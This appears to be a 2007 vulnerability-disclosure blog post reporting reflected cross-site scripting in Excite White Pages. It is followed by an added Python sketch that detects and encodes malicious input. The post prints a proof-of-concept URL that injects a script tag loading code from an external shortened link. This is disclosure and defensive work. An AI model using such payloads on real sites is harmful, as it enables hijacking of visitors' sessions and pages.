MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case the vulnerabilities are at a different domain than in MOSEB-29: Vulnerability at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com), which is located on a server of InfoSpace (Excite’s partner). I found these Cross-Site Scripting holes on 31.05.2007.

XSS:

The vulnerabilities are in the qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US
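A defender-side sketch, added here and not part of the original post or of any Excite/InfoSpace code: it scans request URLs for markup in the three parameters named above (including double percent-encoding) and shows the HTML-encoded echo that neutralizes the reflection. The host `wp.example`, the sample URLs and the function names are constructed for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names taken from the post; matched case-insensitively because
# the post writes "qn" while the sample URL uses "QN".
REFLECTED_PARAMS = {"qn", "qf", "qc"}
# Angle brackets never belong in a name/city field. Quotes are not used for
# detection because legitimate names contain them (O'Fallon); they are still
# encoded on output below.
MARKUP_CHARS = set("<>")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url):
    """Return {param: decoded value} for reflected params carrying markup."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() in REFLECTED_PARAMS:
            decoded = fully_decode(value)
            if MARKUP_CHARS & set(decoded):
                hits[name] = decoded
    return hits


def render_query_echo(value):
    """Hardened echo: HTML-encode the value before placing it in the page."""
    return "<b>Results for: " + html.escape(value, quote=True) + "</b>"


# Constructed sample requests (hypothetical host, not from the post).
SAMPLE_URLS = [
    "http://wp.example/results?QN=Smith&QF=John&QC=Boston&KCFG=US",
    "http://wp.example/results?QN=%3Cscript%20src=%22//x.example/a.js%22%3E%3C/script%3E",
    "http://wp.example/results?qf=%253Cimg%2520src%253Dx%253E",
    "http://wp.example/results?QC=O%27Fallon",
]
```
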

Moral: searching in white pages can be dangerous.

Note that the Excite engine belongs to IAC Search & Media, so Ask.com is also responsible for these vulnerabilities.

Also note that the Excite White Pages engine uses the InfoSpace engine, so InfoSpace is also responsible for these vulnerabilities.

